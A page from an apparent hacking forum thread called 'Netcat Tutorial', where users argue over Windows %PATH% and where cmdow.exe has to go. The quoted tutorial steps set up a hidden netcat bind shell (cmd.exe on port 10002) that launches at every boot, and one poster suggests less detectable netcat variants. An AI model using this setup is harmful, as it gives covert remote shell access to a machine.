Page 3 of 4 FirstFirst 1234 LastLast

Thread: Netcat Tutorial

That would be correct assuming c:\ is part of %PATH%
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

Very good friend of the forum killadaninja's Avatar

But the root of c:/ isnt a global path on windows isit

Lets say I wanted to start hello.exe which is in the root of c:/
    so i make this batch script and put it in startup

c:
    start hello.exe

Are you saying i could take the c: away and just have

start hello.exe

?
    Sometimes I try to fit a 16-character string into an 8–byte space, on purpose.

%PATH% does not contain c:\ by default.

%PATH% can be set from a command prompt but the change applies only to that command prompt window.

To add things to %PATH% perminently you have to goto System control panel (Winkey+Pause/Break), advanced tab, hitthe "Environment Variables" button, select PATH and hit edit, append c:\ (; is the delimeter).

Then because it's windows you probably have to reboot once to have the change take effect.

It's probably easier to simply ensure that the executable is within the existing %PATH%.
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

Lol Thorin so what your saying is i was right, If you followed the instructions exactly (without setting any global paths, has the instructions dont tell you to do this) then put cmdow.exe in any other folder than startup (where I said) It wouldnt have worked would it? a one word answer will be fine thanks

Quote Originally Posted by killadaninja View Post
    Lol Thorin so what your saying is i was right, If you followed the instructions exactly (without setting any global paths, has the instructions dont tell you to do this) then put cmdow.exe in any other folder than startup (where I said) It wouldnt have worked would it? a one word answer will be fine thanks
    No.

I said:
    1) If it's in %PATH% it will execute (when called via hide.bat).
    2) If you put it in startup it will execute twice (once uselessly and once from hide.bat).

The instructions say:
    Make a batch file with the command "nc -L -p 10002 -d -e cmd.exe" in it. Name this file start.bat and place it the root of your C drive. Download the program cmdow.exe. Make a batch file and name it hide.bat. Inside the file type "cmdow /RUN /HID C:\start.bat". Place this file inside the startup folder.
    Now everytime the computer boots netcat will start hidden.
    Create a batch file (hide.bat) and put it in startup, they don't say anything about the location of cmdow.exe (hence it needs to be in %PATH%).

In hide.bat you could add c:\ to %PATH% thusly:
    Code:
    set PATH=%PATH%;c:\
    But why set it to include c:\ (assuming you're suggesting that's the location of cmdow.exe) when you could simply place cmdow.exe is an existing execution location as defined by %PATH%?

Im trying not to say anything so ill just say yes put it in your start folder, theres a good boi

Quote Originally Posted by thorin View Post
    Actually I think you're wrong. Looking at the instructions quoted if he put cmdow in the start folder it would then run once as itself (uselessly) and once from hide.bat (which is actually what the original instructions are trying to suggest be placed in the startup folder...IMHO).
    Well Thorin say what you want the point is
    Actually I think you're wrong.).
    not only was i not wrong, if he done anything other than put it in his start up folder it wouldnt have done nothing. You hadent even mentioned setting gloal paths at that point in time. Im not here to argue with you thorin just admit you was wrong and we can move on.

Im trying not to say anything so ill just say yes put it in your start folder, theres a good boi
    Why do you want it to execute twice?

Well Thorin say what you want the point is not only was i not wrong, if he done anything other than put it in his start up folder it wouldnt have done nothing.
    False
    You hadent even mentioned setting gloal paths at that point in time.
    Your right I didn't mention setting it, because you dont' have to set it. I said cmdow.exe needs to be within %PATH% in order to execute from a batch file (or command prompt). %PATH% exists on every windows system, it is the selection of folders from which you can execute things when at a command prompt (which is essentially where you are when using a batch script) [unless you specify the entire path to the executable, i.e. c:\somefolder\blef.exe].

Actually I think you're wrong. Looking at the instructions quoted if he put cmdow in the start folder it would then run once as itself (uselessly) and once from hide.bat (which is actually what the original instructions are trying to suggest be placed in the startup folder...IMHO).
    Well Thorin say what you want the point is
    Actually I think you're wrong.).
    when actually i wasent the simplest thing to do imho was just to answer yes to his question "what do you do with the cmdow.exe ??? do you also put it in the startup folder???

we are both right lets get on with our lives

Well Thorin say what you want the point is when actually i wasent the simplest thing to do imho was just to answer yes to his question "what do you do with the cmdow.exe ??? do you also put it in the startup folder???

we are both right lets get on with our lives
    I'm really confused by your double post.

1) Yes I agree to disagree.
    2) WRT the underlined part, the simplest thing to do is to put it in the startup folder. Given the original question I don't see this as a technically feasible/correct answer. Why bother being stealthy at all (hiding windows etc) if you're going to do it improperly?

The simplest thing to do is to put it in the startup folder. Given the original question I don't see this as a technically feasible/correct answer. Why bother being stealthy at all (hiding windows etc) if you're going to do it improperly?
    While my knowledge is limited i do know that if your looking for something stealthy NC shouldn't even be considered the same goes for cmdow.

If you insist on using NC you might want to check out CryptCat, also lupin posted a link for a undetected version of NC .. but im to lazy to dig it up.
    Using backtrack for the first time is like being 10 years old again with the keys to a Ferrari.

Page 3 of 4 FirstFirst 1234 LastLast